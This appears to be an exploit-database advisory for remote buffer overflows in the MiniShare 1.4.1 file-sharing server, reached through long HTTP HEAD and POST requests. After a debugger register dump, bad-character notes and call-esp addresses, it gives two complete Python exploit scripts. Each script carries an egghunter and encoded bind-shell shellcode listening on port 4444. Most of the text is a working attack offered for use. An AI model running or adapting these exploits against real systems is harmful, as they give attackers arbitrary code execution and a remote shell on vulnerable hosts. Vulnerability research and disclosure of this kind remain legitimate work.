MiniShare 1.4.1 HEAD / POST Buffer Overflow

2018.12.08
Risk: High
Local: No
Remote: Yes
CWE: CWE-119

Hi!!! Playing in 2006... I have adapted the exploit to Python.
Not only the GET method is vulnerable to the buffer overflow (BOF, CVE-2004-2271): the HEAD and POST methods are also vulnerable. The difference is minimal, and both are exploited in the same way. There is only a 1-byte difference, from the length of the method name: GET = 3, HEAD and POST = 4.
-------------------------------------------------------------------
EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII "6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co HTTP/1.1 "
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
------------------------------------------------------------------------------
Only 210 bytes to shellcode
------------------------------------------------------------------------------
Badchars '00','0d'
------------------------------------------------------------------------------
>findjmp kernel32.dll esp - XP SP 3 English
Scanning kernel32.dll for code useable with the esp register
0x7C809F83 call esp
0x7C8369E0 call esp
0x7C83C2C5 push esp - ret
0x7C87641B call esp
<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19861
# Category: exploit
1. 
Description Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP HEAD request. 2. Proof of Concept Exploit: #!/usr/bin/env python import socket import struct import os # Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP HEAD request - by Rafa # CVE: CVE-2018-19861 # Via Egghunter because shellcode in ESP only 210 bytes long. # Project Home Page (MiniShare) - http://minishare.sourceforge.net/ connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "127.0.0.1" port = 80 # 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -a x86 --platform windows -b "\x00\x0d" -f c #Found 10 compatible encoders #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai #x86/shikata_ga_nai succeeded with size 355 (iteration=0) #x86/shikata_ga_nai chosen with final size 355 #Payload size: 355 bytes #Final size of c file: 1516 bytes #unsigned char buf[] = shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" "\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f" "\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a" "\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f" "\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16" "\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d" "\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97" "\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2" "\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa" "\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43" "\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3" "\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d" 
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77" "\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49" "\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07" "\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0" "\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83" "\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59" "\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda" "\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13" "\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76" "\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5" "\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f" "\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c") # findjmp kernel32.dll esp - WinXP SP3 English #0x7C809F83 call esp nops = "\x90" * 16 junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 - 1786 - 4 - 16 - len(egghunter)) try: print "Sending exploit..." connection.connect((host,port)) buffer = ( "HEAD " + junk + " HTTP/1.1\r\n" "Host: " + shellcode + "\r\n\r\n") connection.send(buffer) connection.close() print "\nExploit Sended ", len(buffer) except: print "Connection error" 3. Solution: This product is deprecated --> <!-- # Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method. # Date: 05-12-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://minishare.sourceforge.net/ # Software Link: http://minishare.sourceforge.net/ # Version: Minishare v1.4.1 # Tested on: Windows # CVE : CVE-2018-19862 # Category: exploit 1. Description Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP POST request. 2. 
Proof of Concept Exploit: #!/usr/bin/env python import socket import struct import os # Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP POST request - by Rafa # CVE: CVE-2018-19862 # Via Egghunter because shellcode in ESP only 210 bytes long. # Project Home Page (MiniShare) - http://minishare.sourceforge.net/ connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "127.0.0.1" port = 80 # 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -a x86 --platform windows -b "\x00\x0d" -f c #Found 10 compatible encoders #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai #x86/shikata_ga_nai succeeded with size 355 (iteration=0) #x86/shikata_ga_nai chosen with final size 355 #Payload size: 355 bytes #Final size of c file: 1516 bytes #unsigned char buf[] = shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" "\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f" "\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a" "\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f" "\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16" "\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d" "\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97" "\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2" "\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa" "\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43" "\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3" "\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d" "\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77" "\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49" 
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07" "\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0" "\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83" "\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59" "\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda" "\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13" "\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76" "\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5" "\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f" "\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c") # findjmp kernel32.dll esp - WinXP SP3 English #0x7C809F83 call esp nops = "\x90" * 16 junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 - 1786 - 4 - 16 - len(egghunter)) try: print "Sending exploit..." connection.connect((host,port)) buffer = ( "POST " + junk + " HTTP/1.1\r\n" "Host: " + shellcode + "\r\n\r\n") connection.send(buffer) connection.close() print "\nExploit Sended ", len(buffer) except: print "Connection error" 3. Solution: This product is deprecated -->

